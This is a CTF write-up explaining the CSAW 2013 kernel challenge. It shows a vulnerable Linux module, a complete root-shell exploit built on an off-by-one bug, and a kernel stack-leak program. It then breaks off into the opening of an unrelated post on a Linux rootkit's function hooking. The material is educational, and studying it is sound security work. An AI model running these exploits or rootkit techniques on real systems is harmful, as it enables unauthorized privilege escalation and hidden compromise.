CSAW CTF 2013 Kernel Exploitation Challenge

Table of Contents

Introduction

CSAW CTF 2013 was last weekend, and this year I was lucky enough to be named a judge for the competition.  I decided to bring back the Linux kernel exploitation tradition of previous years and submitted the challenge “Brad Oberberg.”  Four of the 15 teams successfully solved the challenge.

Each team was presented with unprivileged access to a live VM running 32-bit Ubuntu 12.04.3 LTS.  The vulnerable kernel module csaw.ko was loaded on each system, and successful exploitation would allow for local privilege escalation and subsequent reading of the flag.  Source code to the kernel module was provided to each team, and may be viewed below (or downloaded here):

/*
 *                      .ed"""" """$$$$be.
 *                    -"           ^""**$$$e.
 *                  ."                   '$$$c
 *                 /     C S A W          "4$$b
 *                d  3      2 0 1 3         $$$$
 *                $  *                   .$$$$$$
 *               .$  ^c           $$$$$e$$$$$$$$.
 *               d$L  4.         4$$$$$$$$$$$$$$b
 *               $$$$b ^ceeeee.  4$$ECL.F*$$$$$$$
 *   e$""=.      $$$$P d$$$$F $ $$$$$$$$$- $$$$$$
 *  z$$b. ^c     3$$$F "$$$$b   $"$$$$$$$  $$$$*"      .=""$c
 * 4$$$$L        $$P"  "$$b   .$ $$$$$...e$$        .=  e$$$.
 * ^*$$$$$c  %..   *c    ..    $$ 3$$$$$$$$$$eF     zP  d$$$$$
 *   "**$$$ec   "   %ce""    $$$  $$$$$$$$$$*    .r" =$$$$P""
 *         "*$b.  "c  *$e.    *** d$$$$$"L$$    .d"  e$$***"
 *           ^*$$c ^$c $$$      4J$$$$$% $$$ .e*".eeP"
 *              "$$$$$$"'$=e....$*$$**$cz$$" "..d$*"
 *                "*$$$  *=%4.$ L L$ P3$$$F $$$P"
 *                   "$   "%*ebJLzb$e$$$$$b $P"
 *                     %..      4$$$$$$$$$$ "
 *                      $$$e   z$$$$$$$$$$%
 *                       "*$c  "$$$$$$$P"
 *                        ."""*$$$$$$$$bc
 *                     .-"    .$***$$$"""*e.
 *                  .-"    .e$"     "*$c  ^*b.
 *           .=*""""    .e$*"          "*bc  "*$e..
 *         .$"        .z*"               ^*$e.   "*****e.
 *         $$ee$c   .d"                     "*$.        3.
 *         ^*$E")$..$"                         *   .ee==d%
 *            $.d$$$*                           *  J$$$e*
 *             """""                              "$$$" Gilo95'
 */

#include <linux/init.h>
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/miscdevice.h>
#include <linux/mm.h>
#include <linux/fs.h>
#include <linux/slab.h>
#include <linux/random.h>
#include <linux/list.h>
#include <linux/sched.h>
#include <asm/uaccess.h>

#define DRIVER_VERSION "CSAW SUCKiT v1.3.37"

#define CSAW_IOCTL_BASE     0x77617363
#define CSAW_ALLOC_HANDLE   CSAW_IOCTL_BASE+1
#define CSAW_READ_HANDLE    CSAW_IOCTL_BASE+2
#define CSAW_WRITE_HANDLE   CSAW_IOCTL_BASE+3
#define CSAW_GET_CONSUMER   CSAW_IOCTL_BASE+4
#define CSAW_SET_CONSUMER   CSAW_IOCTL_BASE+5
#define CSAW_FREE_HANDLE    CSAW_IOCTL_BASE+6
#define CSAW_GET_STATS	    CSAW_IOCTL_BASE+7

#define MAX_CONSUMERS 255

struct csaw_buf {
    unsigned long consumers[MAX_CONSUMERS];
    char *buf;
    unsigned long size;
    unsigned long seed;
    struct list_head list;
};

LIST_HEAD(csaw_bufs);

struct alloc_args {
    unsigned long size;
    unsigned long handle;
};

struct free_args {
    unsigned long handle;
};

struct read_args {
    unsigned long handle;
    unsigned long size;
    void *out;
};

struct write_args {
    unsigned long handle;
    unsigned long size;
    void *in;
};

struct consumer_args {
    unsigned long handle;
    unsigned long pid;
    unsigned char offset;
};

struct csaw_stats {
    unsigned long clients;
    unsigned long handles;
    unsigned long bytes_read;
    unsigned long bytes_written;
    char version[40];
};

unsigned long clients = 0;
unsigned long handles = 0;
unsigned long bytes_read = 0;
unsigned long bytes_written = 0;

static int csaw_open ( struct inode *inode, struct file *file )
{
    clients++;

    return 0;
}

static int csaw_release ( struct inode *inode, struct file *file )
{
    clients--;

    return 0;
}

int alloc_buf ( struct alloc_args *alloc_args )
{
    struct csaw_buf *cbuf;
    char *buf;
    unsigned long size, seed, handle;

    size = alloc_args->size;

    if ( ! size )
        return -EINVAL;

    cbuf = kmalloc(sizeof(*cbuf), GFP_KERNEL);
    if ( ! cbuf )
        return -ENOMEM;

    buf = kzalloc(size, GFP_KERNEL);
    if ( ! buf )
    {
        kfree(cbuf);
        return -ENOMEM;
    }

    cbuf->buf = buf;
    cbuf->size = size;

    memset(&cbuf->consumers, 0, sizeof(cbuf->consumers));
    cbuf->consumers[0] = current->pid;

    get_random_bytes(&seed, sizeof(seed));

    cbuf->seed = seed;

    handle = (unsigned long)buf ^ seed;

    list_add(&cbuf->list, &csaw_bufs);

    alloc_args->handle = handle;

    return 0;
}

void free_buf ( struct csaw_buf *cbuf )
{
    list_del(&cbuf->list);
    kfree(cbuf->buf);
    kfree(cbuf);
}

struct csaw_buf *find_cbuf ( unsigned long handle )
{
    struct csaw_buf *cbuf;

    list_for_each_entry ( cbuf, &csaw_bufs, list )
        if ( handle == ((unsigned long)cbuf->buf ^ cbuf->seed) )
            return cbuf;

    return NULL;
}

static long csaw_ioctl ( struct file *file, unsigned int cmd, unsigned long arg )
{
    int ret = 0;
    unsigned long *argp = (unsigned long *)arg;

    switch ( cmd )
    {
        case CSAW_ALLOC_HANDLE:
        {
            int ret;
            struct alloc_args alloc_args;

            if ( copy_from_user(&alloc_args, argp, sizeof(alloc_args)) )
                return -EFAULT;

            if ( (ret = alloc_buf(&alloc_args)) < 0 )
                return ret;

            if ( copy_to_user(argp, &alloc_args, sizeof(alloc_args)) )
                return -EFAULT;

            handles++;

            break;
        }

        case CSAW_READ_HANDLE:
        {
            struct read_args read_args;
            struct csaw_buf *cbuf;
            unsigned int i, authorized = 0;
            unsigned long to_read;

            if ( copy_from_user(&read_args, argp, sizeof(read_args)) )
                return -EFAULT;

            cbuf = find_cbuf(read_args.handle);
            if ( ! cbuf )
                return -EINVAL;

            for ( i = 0; i < MAX_CONSUMERS; i++ )
                 if ( current->pid == cbuf->consumers[i] )
                    authorized = 1;

            if ( ! authorized )
                return -EPERM;

            to_read = min(read_args.size, cbuf->size);

            if ( copy_to_user(read_args.out, cbuf->buf, to_read) )
                return -EFAULT;

            bytes_read += to_read;

            break;
        }

        case CSAW_WRITE_HANDLE:
        {
            struct write_args write_args;
            struct csaw_buf *cbuf;
            unsigned int i, authorized = 0;
            unsigned long to_write;

            if ( copy_from_user(&write_args, argp, sizeof(write_args)) )
                return -EFAULT;

            cbuf = find_cbuf(write_args.handle);
            if ( ! cbuf )
                return -EINVAL;

            for ( i = 0; i < MAX_CONSUMERS; i++ )
                 if ( current->pid == cbuf->consumers[i] )
                    authorized = 1;

            if ( ! authorized )
                return -EPERM;

            to_write = min(write_args.size, cbuf->size);

            if ( copy_from_user(cbuf->buf, write_args.in, to_write) )
                return -EFAULT;

            bytes_written += to_write;

            break;
        }

        case CSAW_GET_CONSUMER:
        {
            struct consumer_args consumer_args;
            struct csaw_buf *cbuf;
            unsigned int i, authorized = 0;

            if ( copy_from_user(&consumer_args, argp, sizeof(consumer_args)) )
                return -EFAULT;

            cbuf = find_cbuf(consumer_args.handle);
            if ( ! cbuf )
                return -EINVAL;

            for ( i = 0; i < MAX_CONSUMERS; i++ )
                 if ( current->pid == cbuf->consumers[i] )
                    authorized = 1;

            if ( ! authorized )
                return -EPERM;

            consumer_args.pid = cbuf->consumers[consumer_args.offset];

            if ( copy_to_user(argp, &consumer_args, sizeof(consumer_args)) )
                return -EFAULT;

            break;
        }

        case CSAW_SET_CONSUMER:
        {
            struct consumer_args consumer_args;
            struct csaw_buf *cbuf;
            unsigned int i, authorized = 0;

            if ( copy_from_user(&consumer_args, argp, sizeof(consumer_args)) )
                return -EFAULT;

            cbuf = find_cbuf(consumer_args.handle);
            if ( ! cbuf )
                return -EINVAL;

            for ( i = 0; i < MAX_CONSUMERS; i++ )
                 if ( current->pid == cbuf->consumers[i] )
                    authorized = 1;

            if ( ! authorized )
                return -EPERM;

            cbuf->consumers[consumer_args.offset] = consumer_args.pid;

            break;
        }

        case CSAW_FREE_HANDLE:
        {
            struct free_args free_args;
            struct csaw_buf *cbuf;
            unsigned int i, authorized = 0;

            if ( copy_from_user(&free_args, argp, sizeof(free_args)) )
                return -EFAULT;

            cbuf = find_cbuf(free_args.handle);
            if ( ! cbuf )
                return -EINVAL;

            for ( i = 0; i < MAX_CONSUMERS; i++ )
                 if ( current->pid == cbuf->consumers[i] )
                    authorized = 1;

            if ( ! authorized )
                return -EPERM;

            free_buf(cbuf);

            handles--;

            break;
        }

        case CSAW_GET_STATS:
        {
            struct csaw_stats csaw_stats;

            csaw_stats.clients = clients;
            csaw_stats.handles = handles;
            csaw_stats.bytes_read = bytes_read;
            csaw_stats.bytes_written = bytes_written;
            strcpy(csaw_stats.version, DRIVER_VERSION);

            if ( copy_to_user(argp, &csaw_stats, sizeof(csaw_stats)) )
                return -EFAULT;

            break;
        }

        default:
            ret = -EINVAL;
            break;
    }

    return ret;
}

static ssize_t csaw_read ( struct file *file, char *buf, size_t count, loff_t *pos )
{
    char *stats;
    unsigned int to_read;
    unsigned int ret;

    stats = kmalloc(1024, GFP_KERNEL);
    if ( ! buf )
        return -ENOMEM;

    ret = snprintf(stats, 1024, "Active clients: %lu\nHandles allocated: %lu\nBytes read: %lu\nBytes written: %lu\n",
             clients, handles, bytes_read, bytes_written);

    if ( count < ret )
        to_read = count;
    else
        to_read = ret;

    if ( copy_to_user(buf, stats, to_read) )
    {
        kfree(stats);
        return -EFAULT;
    }

    kfree(stats);

    return 0;
}

static const struct file_operations csaw_fops = {
    owner:          THIS_MODULE,
    open:           csaw_open,
    release:        csaw_release,
    unlocked_ioctl: csaw_ioctl,
    read:           csaw_read,
};

static struct miscdevice csaw_miscdev = {
    name:   "csaw",
    fops:   &csaw_fops
};

static int __init lezzdoit ( void )
{
    misc_register(&csaw_miscdev);

    return 0;
}

static void __exit wereouttahurr ( void )
{
    misc_deregister(&csaw_miscdev);
}

module_init(lezzdoit);
module_exit(wereouttahurr);

MODULE_LICENSE("GPL");

Understanding the Code

The kernel module is meant to provide a shared buffer system between processes.  By interacting with the /dev/csaw interface, processes may do various things such as allocating a new buffer of arbitrary size, reading and writing to the buffer, and controlling which process IDs may operate on it.  The main point of interaction with the module is through the ioctl handler csaw_ioctl().

The CSAW_ALLOC_HANDLE command allocates a new buffer of size specified by the user and returns a handle.  A handle in this context is simply the the buffer address XOR’d with a random 32-bit value.

Given a valid handle to an existing allocated buffer, the commands CSAW_READ_HANDLE and CSAW_WRITE_HANDLE allow the user to read and write the contents of the buffer.  Only process IDs authorized in the buffer’s consumers array may perform these operations, however.

Again, given a valid handle to an existing allocated buffer, the CSAW_GET_CONSUMER and CSAW_SET_CONSUMER commands allow only authorized processes to modify the buffer’s consumers array.

Finally, the CSAW_FREE_HANDLE command allows authorized consumers to free a given buffer.

An extra command CSAW_GET_STATS provides no direct functionality towards shared buffer management, but provides interesting debug information about the module.  Calling read() on the interface provides similar data.

Tracing the Vulnerable Code Path

Upon entry to csaw_ioctl(), user controls the arguments cmd and arg, and thus the variable argp:

183 static long csaw_ioctl ( struct file *file, unsigned int cmd, unsigned long arg )
184 {
185     int ret = 0;
186     unsigned long *argp = (unsigned long *)arg;
187 
188     switch ( cmd )
189     {

By providing the CSAW_SET_CONSUMER command, the following case is chosen:

299         case CSAW_SET_CONSUMER:
300         {
301             struct consumer_args consumer_args;
302             struct csaw_buf *cbuf;
303             unsigned int i, authorized = 0;
304 
305             if ( copy_from_user(&consumer_args, argp, sizeof(consumer_args)) )
306                 return -EFAULT;
307 
308             cbuf = find_cbuf(consumer_args.handle);
309             if ( ! cbuf )
310                 return -EINVAL;

On line 305, user data is safely copied into the struct consumer_args:

91 struct consumer_args {
92     unsigned long handle;
93     unsigned long pid;
94     unsigned char offset;
95 };

On line 308, consumer_args.handle is verified to be a valid handle.  By previously allocating a new buffer via the CSAW_ALLOC_HANDLE command and passing the returned handle here, this check may be satisfied.

Next, the calling process to verified to be in the list of authorized consumers:

312             for ( i = 0; i < MAX_CONSUMERS; i++ )
313                 if ( current->pid == cbuf->consumers[i] )
314                     authorized = 1;
315 
316             if ( ! authorized )
317                 return -EPERM;

Since our current process is also the creator of the given handle, this check is satisfied automatically due to the consumers array being initialized with the current process ID.

Next, the consumers list is updated to reflect the desired edit:

319             cbuf->consumers[consumer_args.offset] = consumer_args.pid;

Line 319 is interesting for a variety of reasons.

At first sight, it appears to suffer from an unbounded array index vulnerability due to the user-controlled consumer_args.offset value being used directly as an array index without prior sanity check.  With such a vulnerability, it would be possible to write a user-controlled 32-bit value at an arbitrary offset from &cbuf->consumers.

However, upon further inspection of the struct definition, we find that consumer_args.offset is in fact of type unsigned char, meaning that its value is bounded from 0-255 instead of 0-(232-1).

Looking at the definition of struct csaw_buf, we find that cbuf->consumers is appropriately sized and doesn’t allow a user to index outside of the array:

58 #define MAX_CONSUMERS 255
59 
60 struct csaw_buf {
61     unsigned long consumers[MAX_CONSUMERS];
62     char *buf;
63     unsigned long size;
64     unsigned long seed;
65     struct list_head list;
66 };

…Or does it?

Recall how C buffer allocation and array indexing works.  The consumers array is allocated with size 255 elements.  By providing the value 255 as an array index, we are not referencing the last element, but instead one past the last element since C begins counting at the 0 index.

This means there is an off-by-one vulnerability in this code, and we can write an arbitrary 32-bit value immediately after the end of consumers in our buffer’s csaw_cbuf struct (or leak the existing value via CSAW_GET_CONSUMER).

Leveraging the Vulnerability

The actual impact of this vulnerability depends on exactly what data follows the consumers array and what control is afforded by manipulating it.

Interestingly enough, we notice that a pointer buf immediately follows the array and may be fully controlled or leaked with our bug:

60 struct csaw_buf {
61     unsigned long consumers[MAX_CONSUMERS];
62     char *buf;
63     unsigned long size;
64     unsigned long seed;
65     struct list_head list;
66 };

This buf pointer stores the location of the heap buffer associated with an allocated handle. In normal operation, the module would read and write to this pointer when getting or settings the contents of a shared buffer.  Instead, we can abuse the functionality of CSAW_WRITE_HANDLE to achieve an exploitation primitive:

240         case CSAW_WRITE_HANDLE:
241         {
242             struct write_args write_args;
243             struct csaw_buf *cbuf;
244             unsigned int i, authorized = 0;
245             unsigned long to_write;
246 
247             if ( copy_from_user(&write_args, argp, sizeof(write_args)) )
248                 return -EFAULT;
249 
250             cbuf = find_cbuf(write_args.handle);
251             if ( ! cbuf )
252                 return -EINVAL;
253 
254             for ( i = 0; i < MAX_CONSUMERS; i++ ) 255                 if ( current->pid == cbuf->consumers[i] )
256                     authorized = 1;
257 
258             if ( ! authorized )
259                 return -EPERM;
260 
261             to_write = min(write_args.size, cbuf->size);
262 
263             if ( copy_from_user(cbuf->buf, write_args.in, to_write) )
264                 return -EFAULT;
265 
266             bytes_written += to_write;
267 
268             break;
269         }

On line 263, user data is presumably safely copied into kernelspace using the copy_from_user() function.  However, with our newfound control over cbuf->buf, we may now point this write operation at any arbitrary location in the kernel, resulting in an arbitrary write primitive.

Mirroring this functionality in CSAW_READ_HANDLE, we may also leverage the bug to leak memory at any arbitrary location in the kernel, resulting in an arbitrary read primitive.

Circumventing Additional Obstacles

Although we’ve identified a vector by which to leverage our off-by-one as arbitrary read and write primitives, there are still additional obstacles to overcome before continuing with our exploit.

Specifically, the call to find_cbuf() on line 250 of CSAW_WRITE_HANDLE is troublesome:

250             cbuf = find_cbuf(write_args.handle);
251             if ( ! cbuf )
252                 return -EINVAL;

Looking at the implementation of find_cbuf(), we find something interesting:

172 struct csaw_buf *find_cbuf ( unsigned long handle )
173 {
174     struct csaw_buf *cbuf;
175 
176     list_for_each_entry ( cbuf, &csaw_bufs, list )
177         if ( handle == ((unsigned long)cbuf->buf ^ cbuf->seed) )
178             return cbuf;
179 
180     return NULL;
181 }

On lines 176-178, the function iterates through the linked list of allocated buffers and determines if the user-supplied handle matches that of an existing buffer.

Recall that handles are calculated as an XOR of the buffer address and 32 bits of randomness.  Thus, by corrupting an existing cbuf->buf address, all handle lookups for that buffer will subsequently fail since the calculation no longer matches our given handle.

Thus, in order to achieve our arbitrary read and write, we will need to first somehow leak the buffer’s seed value and recalculate the necessary handle to pass in.  Although seed can’t be directly leaked with the off-by-one bug, it is still possible to infer its value due to the nature of the calculation.

Thanks to the reversibility of the XOR operation, we can instead first leak the existing cbuf->buf value and XOR it with its given handle, obtaining the seed value as a result. Then, by XOR’ng the new cbuf->buf value with the leaked seed, a new valid handle may be calculated and passed in, satisfying the validation function and successfully returning the manipulated buffer struct.

With all obstacles satisfied and exploit primitives realized, it’s time to write an exploit.

Achieving Local Privilege Escalation

While there are numerous techniques to achieve privilege escalation, my solution to the challenge uses the common technique of simply overwriting and triggering a kernel function pointer with the address of a payload in userspace.

Despite an effort to const-ify (make read-only) all possible function pointers in the kernel, certain design patterns still leave opportunity open for easy exploitation.  By overwriting the aio_write function pointer within the ptmx_fops struct associated with /dev/ptmx, it is possible to subsequently trigger the pointer with a call to readv().  In addition to my solution, this specific technique may also be observed in the Enlightenment framework written by Brad Spengler (spender).

After corrupting and triggering the function pointer, kernel execution is then transferred to the following payload in userspace:

127 typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
128 typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
129 
130 unsigned long commit_creds;
131 unsigned long prepare_kernel_cred;
132 unsigned long *cleanup;
133 
134 int get_root ( void *iocb, const struct iovec *iov, unsigned long nr_segs, loff_t pos )
135 {
136     _commit_creds commit = (_commit_creds)commit_creds;
137     _prepare_kernel_cred prepare = (_prepare_kernel_cred)prepare_kernel_cred;
138 
139     *cleanup = 0;
140 
141     commit(prepare(0));
142 
143     return 0;
144 }

Kernel symbol resolution was enabled for this challenge, so determining the addresses of commit_creds, prepare_kernel_cred, and ptmx_fops was achieved simply by parsing the output of /proc/kallsyms.

Since the value of aio_read within ptmx_fops is by default 0, cleanup was relatively painless and only required writing the value 0 back to the corrupted pointer location.

Exploit

Download

/*
 * CSAW 2013 Michael Coppola solution
 */

#include 
#include 
#include 
#include <sys/ioctl.h>
#include 
#include 
#include 
#include <sys/uio.h>
#include <sys/utsname.h>

#define BUF_SIZE 0x100

#define CSAW_IOCTL_BASE     0x77617363
#define CSAW_ALLOC_HANDLE   CSAW_IOCTL_BASE+1
#define CSAW_READ_HANDLE    CSAW_IOCTL_BASE+2
#define CSAW_WRITE_HANDLE   CSAW_IOCTL_BASE+3
#define CSAW_GET_CONSUMER   CSAW_IOCTL_BASE+4
#define CSAW_SET_CONSUMER   CSAW_IOCTL_BASE+5
#define CSAW_FREE_HANDLE    CSAW_IOCTL_BASE+6
#define CSAW_GET_STATS      CSAW_IOCTL_BASE+7

struct alloc_args {
    unsigned long size;
    unsigned long handle;
};

struct free_args {
    unsigned long handle;
};

struct read_args {
    unsigned long handle;
    unsigned long size;
    void *out;
};

struct write_args {
    unsigned long handle;
    unsigned long size;
    void *in;
};

struct consumer_args {
    unsigned long handle;
    unsigned long pid;
    unsigned char offset;
};

struct csaw_stats {
    unsigned long clients;
    unsigned long handles;
    unsigned long bytes_read;
    unsigned long bytes_written;
    char version[40];
};

/* thanks spender... */
unsigned long get_kernel_sym(char *name)
{
        FILE *f;
        unsigned long addr;
        char dummy;
        char sname[512];
        struct utsname ver;
        int ret;
        int rep = 0;
        int oldstyle = 0;

        f = fopen("/proc/kallsyms", "r");
        if (f == NULL) {
                f = fopen("/proc/ksyms", "r");
                if (f == NULL)
                        goto fallback;
                oldstyle = 1;
        }

repeat:
        ret = 0;
        while(ret != EOF) {
                if (!oldstyle)
                        ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname);
                else {
                        ret = fscanf(f, "%p %s\n", (void **)&addr, sname);
                        if (ret == 2) {
                                char *p;
                                if (strstr(sname, "_O/") || strstr(sname, "_S."))
                                        continue;
                                p = strrchr(sname, '_');
                                if (p > ((char *)sname + 5) && !strncmp(p - 3, "smp", 3)) {
                                        p = p - 4;
                                        while (p > (char *)sname && *(p - 1) == '_')
                                                p--;
                                        *p = '';
                                }
                        }
                }
                if (ret == 0) {
                        fscanf(f, "%s\n", sname);
                        continue;
                }
                if (!strcmp(name, sname)) {
                        fprintf(stdout, "[+] Resolved %s to %p%s\n", name, (void *)addr, rep ? " (via System.map)" : "");
                        fclose(f);
                        return addr;
                }
        }

        fclose(f);
        if (rep)
                return 0;
fallback:
        uname(&ver);
        if (strncmp(ver.release, "2.6", 3))
                oldstyle = 1;
        sprintf(sname, "/boot/System.map-%s", ver.release);
        f = fopen(sname, "r");
        if (f == NULL)
                return 0;
        rep = 1;
        goto repeat;
}

typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);

unsigned long commit_creds;
unsigned long prepare_kernel_cred;
unsigned long *cleanup;

int get_root ( void *iocb, const struct iovec *iov, unsigned long nr_segs, loff_t pos )
{
    _commit_creds commit = (_commit_creds)commit_creds;
    _prepare_kernel_cred prepare = (_prepare_kernel_cred)prepare_kernel_cred;

    *cleanup = 0;

    commit(prepare(0));

    return 0;
}

int main ( int argc, char **argv )
{
    int fd, pfd, ret;
    unsigned long handle, buf, seed, target, new_handle, ptmx_fops;
    unsigned long payload[4];
    struct alloc_args alloc_args;
    struct write_args write_args;
    struct consumer_args consumer_args;
    struct iovec iov;

    fd = open("/dev/csaw", O_RDONLY);
    if ( fd < 0 )
    {
        perror("open");
        exit(EXIT_FAILURE);
    }

    pfd = open("/dev/ptmx", O_RDWR);
    if ( pfd < 0 )
    {
        perror("open");
        exit(EXIT_FAILURE);
    }

    commit_creds = get_kernel_sym("commit_creds");
    if ( ! commit_creds )
    {
        printf("[-] commit_creds symbol not found, aborting\n");
        exit(1);
    }

    prepare_kernel_cred = get_kernel_sym("prepare_kernel_cred");
    if ( ! prepare_kernel_cred )
    {
        printf("[-] prepare_kernel_cred symbol not found, aborting\n");
        exit(1);
    }

    ptmx_fops = get_kernel_sym("ptmx_fops");
    if ( ! ptmx_fops )
    {
        printf("[-] ptmx_fops symbol not found, aborting\n");
        exit(1);
    }

    memset(&alloc_args, 0, sizeof(alloc_args));
    alloc_args.size = BUF_SIZE;

    ret = ioctl(fd, CSAW_ALLOC_HANDLE, &alloc_args);
    if ( ret < 0 )
    {
        perror("ioctl");
        exit(EXIT_FAILURE);
    }

    handle = alloc_args.handle;

    printf("[+] Acquired handle: %lx\n", handle);

    memset(&consumer_args, 0, sizeof(consumer_args));
    consumer_args.handle = handle;
    consumer_args.offset = 255;

    ret = ioctl(fd, CSAW_GET_CONSUMER, &consumer_args);
    if ( ret < 0 )
    {
        perror("ioctl");
        exit(EXIT_FAILURE);
    }

    buf = consumer_args.pid;

    printf("[+] buf = %lx\n", buf);

    seed = buf ^ handle;

    printf("[+] seed = %lx\n", seed);

    target = ptmx_fops + sizeof(void *) * 4;

    printf("[+] target = %lx\n", target);

    new_handle = target ^ seed;

    printf("[+] new handle = %lx\n", new_handle);

    memset(&consumer_args, 0, sizeof(consumer_args));
    consumer_args.handle = handle;
    consumer_args.offset = 255;
    consumer_args.pid = target;

    ret = ioctl(fd, CSAW_SET_CONSUMER, &consumer_args);
    if ( ret < 0 )
    {
        perror("ioctl");
        exit(EXIT_FAILURE);
    }

    buf = (unsigned long)&get_root;

    memset(&write_args, 0, sizeof(write_args));
    write_args.handle = new_handle;
    write_args.size = sizeof(buf);
    write_args.in = &buf;

    ret = ioctl(fd, CSAW_WRITE_HANDLE, &write_args);
    if ( ret < 0 )
    {
        perror("ioctl");
        exit(EXIT_FAILURE);
    }

    printf("[+] Triggering payload\n");

    cleanup = (unsigned long *)target;

    iov.iov_base = &iov;
    iov.iov_len = sizeof(payload);
    ret = readv(pfd, &iov, 1);

    if ( getuid() )
    {
        printf("[-] Failed to get root\n");
        exit(1);
    }
    else
        printf("[+] Got root!\n");

    printf("[+] Enjoy your shell...\n");
    execl("/bin/sh", "sh", NULL);

    return 0;
}

Proof of Concept

csaw@gibson:~$ ./solution 
[+] Resolved commit_creds to 0xc1073be0
[+] Resolved prepare_kernel_cred to 0xc1073e10
[+] Resolved ptmx_fops to 0xc1ac8ec0
[+] Acquired handle: da56b670
[+] buf = f6a84200
[+] seed = 2cfef470
[+] target = c1ac8ed0
[+] new handle = ed527aa0
[+] Triggering payload
[+] Got root!
[+] Enjoy your shell...
# id
uid=0(root) gid=0(root) groups=0(root)
#

Bonus Points

Although there were no actual bonus points to be awarded in the CTF, there is an additional information leak in the challenge that may have been utilized should symbol resolution be disabled (and you didn’t want to, ya know, use the arbitrary read).

Specifically, the CSAW_GET_STATS command contains the vulnerable code:

351         case CSAW_GET_STATS:
352         {
353             struct csaw_stats csaw_stats;
354 
355             csaw_stats.clients = clients;
356             csaw_stats.handles = handles;
357             csaw_stats.bytes_read = bytes_read;
358             csaw_stats.bytes_written = bytes_written;
359             strcpy(csaw_stats.version, DRIVER_VERSION);
360 
361             if ( copy_to_user(argp, &csaw_stats, sizeof(csaw_stats)) )
362                 return -EFAULT;
363 
364             break;
365         }

The information leak manifests itself in the version member of csaw_stats, where uninitialized kstack data is returned to the user.  This vulnerability may be identified upon further inspection of the struct definition:

 47 #define DRIVER_VERSION "CSAW SUCKiT v1.3.37"
...
 97 struct csaw_stats {
 98     unsigned long clients;
 99     unsigned long handles;
100     unsigned long bytes_read;
101     unsigned long bytes_written;
102     char version[40];
103 };

Note how version is allocated with size 40, while the DRIVER_VERSION string being strcpy()‘d is only 20 bytes long (including the terminating null byte).

The following code leaks out 20 bytes of uninitialized kstack data to userspace:

Download

/*
 * CSAW 2013 Michael Coppola leak uninitialized kstack
 */

#include 
#include 
#include 
#include <sys/ioctl.h>
#include 
#include 
#include 
#include <sys/uio.h>
#include <sys/utsname.h>

#define CSAW_IOCTL_BASE     0x77617363
#define CSAW_GET_STATS      CSAW_IOCTL_BASE+7

struct csaw_stats {
    unsigned long clients;
    unsigned long handles;
    unsigned long bytes_read;
    unsigned long bytes_written;
    char version[40];
};

int main ( int argc, char **argv )
{
    int fd, ret, i;
    struct csaw_stats csaw_stats;

    fd = open("/dev/csaw", O_RDONLY);
    if ( fd < 0 )
    {
        perror("open");
        exit(EXIT_FAILURE);
    }

    memset(&csaw_stats, 0, sizeof(csaw_stats));

    ret = ioctl(fd, CSAW_GET_STATS, &csaw_stats);
    if ( ret < 0 )
    {
        perror("ioctl");
        exit(EXIT_FAILURE);
    }

    for ( i = 0; i < 20; i++ )
        printf("%02hhx ", csaw_stats.version[20+i]);
    printf("\n");

    return 0;
}

And proof of concept:

csaw@gibson:~$ for i in {1..10}; do ./leak; done
00 ce 80 f6 14 00 00 00 28 00 00 00 30 79 62 b7 00 00 00 00 
40 c5 80 f6 14 00 00 00 28 00 00 00 30 39 6f b7 00 00 00 00 
00 c7 80 f6 14 00 00 00 28 00 00 00 30 a9 68 b7 00 00 00 00 
c0 b8 82 f4 14 00 00 00 28 00 00 00 30 b9 66 b7 00 00 00 00 
00 c7 80 f6 14 00 00 00 28 00 00 00 30 b9 68 b7 00 00 00 00 
00 50 a6 f6 14 00 00 00 28 00 00 00 30 89 64 b7 00 00 00 00 
c0 58 a6 f6 14 00 00 00 28 00 00 00 30 29 67 b7 00 00 00 00 
00 50 a6 f6 14 00 00 00 28 00 00 00 30 69 6c b7 00 00 00 00 
c0 58 a6 f6 14 00 00 00 28 00 00 00 30 39 69 b7 00 00 00 00 
00 50 a6 f6 14 00 00 00 28 00 00 00 30 e9 65 b7 00 00 00 00 
csaw@gibson:~$

Depending on the uninitialized data returned, it’s possible to leak pointers which may be used to calculate the base of one’s own kstack.  Using this information in the absence of known targets for a write primitive, a calculated write may then be performed into the kstack to subsequently gain code execution.

This technique, known as “stackjacking,” was presented by Dan Rosenberg and Jon Oberheide in 2011 as a technique to exploit a Linux kernel hardened by the grsecurity patchset.

Although I have written a modified version of my solution that utilizes stackjacking for local privilege escalation, I’ll leave its implementation as an exercise to the reader.

Suterusu Rootkit: Inline Kernel Function Hooking on x86 and ARM

Table of Contents

Introduction

A number of months ago, I added a new project to the redmine tracker github showcasing some code I worked on over the summer (https://github.com/mncoppola/suterusu).

Through my various router persistence and kernel exploitation adventures, I’ve taken a recent interest in Linux kernel rootkits and what makes them tick.  I did some searching around mainly in the packetstorm.org archive and whatever blogs turned up, but to my surprise there really wasn’t much to be found in the realm of modern public Linux rootkits.  The most prominent results centered around adore-ng, which hasn’t been updated since 2007 (at least, from the looks of it), and a few miscellaneous names like suckit, kbeast, and Phalanx.  A lot changes in the kernel from year to year, and I was hoping for something a little more recent.

So, like most of my projects, I said “screw it” and opened vim.  I’ll write my own rootkit designed to work on modern systems and architectures, and I’ll learn how they work through the act of doing it myself.  I’d like to (formally) introduce you to Suterusu, my personal kernel rootkit project targeting Linux 2.6 and 3.x on x86 and ARM.

There’s a lot to talk about in the way of techniques, design, and implementation, but I’ll start out with some of the basics.  Suterusu currently sports a large array of features, with many more in staging, but it may be more appropriate to devote separate blog posts to these.

Function Hooking in Suterusu

Most rootkits traditionally perform system call hooking by swapping out function pointers in the system call table, but this technique is well known and trivially detectable by intelligent rootkit detectors.  Instead of pursuing this route, Suterusu utilizes a different technique and performs hooking by modifying the prologue of the target function to transfer execution to the replacement routine.  This can be observed by examining the following four functions:

  • hijack_start()
  • hijack_pause()
  • hijack_resume()
  • hijack_stop()

These functions track hooks through a linked list of sym_hook structs, defined as:

struct sym_hook {
    void *addr;
    unsigned char o_code[HIJACK_SIZE];
    unsigned char n_code[HIJACK_SIZE];
    struct list_head list;
};

LIST_HEAD(hooked_syms);

To fully understand the hooking process, let’s step through some code.

Function Hooking on x86

